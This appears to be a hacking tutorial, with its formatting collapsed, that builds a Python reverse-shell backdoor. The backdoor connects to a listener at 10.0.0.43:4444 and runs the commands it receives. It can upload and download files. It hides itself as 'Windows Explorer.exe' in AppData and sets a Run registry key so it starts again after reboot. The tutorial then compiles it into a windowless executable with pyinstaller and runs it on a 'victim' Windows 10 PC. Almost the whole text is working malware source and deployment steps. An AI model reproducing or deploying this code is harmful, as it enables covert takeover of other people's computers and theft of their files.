Polish the Python code by adding the become_persistent function.
#!/usr/bin/env python import json import socket import subprocess import os import base64 import sys import shutil class Backdoor: def __init__(self, ip, port): self.become_persistent() self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) self.connection.connect((ip, port)) def become_persistent(self): evil_file_location = os.environ["appdata"] + "\Windows Explorer.exe" if not os.path.exists(evil_file_location): shutil.copyfile(sys.executable, evil_file_location) subprocess.call('reg add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v test /t REG_SZ /d "' + evil_file_location + '"', shell=True) def reliable_send(self, data): json_data = json.dumps(data).encode() self.connection.send(json_data) def reliable_receive(self): json_data = "" while True: try: json_data = json_data + self.connection.recv(1024).decode() return json.loads(json_data) except ValueError: continue def change_working_directory_to(self, path): os.chdir(path) return "[+] Changing working directory to " + path def execute_system_command(self, command): DEVNULL = open(os.devnull, "wb") return subprocess.check_output(command, shell=True, stderr=DEVNULL, stdin=DEVNULL) def read_file(self, path): with open(path, "rb") as file: return base64.b64encode(file.read()) def write_file(self, path, content): with open(path, "wb") as file: file.write(base64.b64decode(content)) return "[+] Upload successful." def run(self): while True: command = self.reliable_receive() try: if command[0] == "exit": self.connection.close() sys.exit() elif command[0] == "cd" and len(command) > 1: command_result = self.change_working_directory_to(command[1]) elif command[0] == "upload": command_result = self.write_file(command[1], command[2]) elif command[0] == "download": command_result = self.read_file(command[1]).decode() else: command_result = self.execute_system_command(command).decode() except Exception: command_result = "[-] Error during command execution." self.reliable_send(command_result) try: my_backdoor = Backdoor("10.0.0.43", 4444) my_backdoor.run() except Exception: sys.exit()
Convert to Windows executable file.
wine /root/.wine/drive_c/Program Files (x86)/Python37-32/Scripts/pyinstaller.exe reverse_backdoor.py --onefile --noconsole
Execute the reverse_backdoor file on the victim Windows 10 PC.
Restarted the victim Windows PC and the communication established automatically.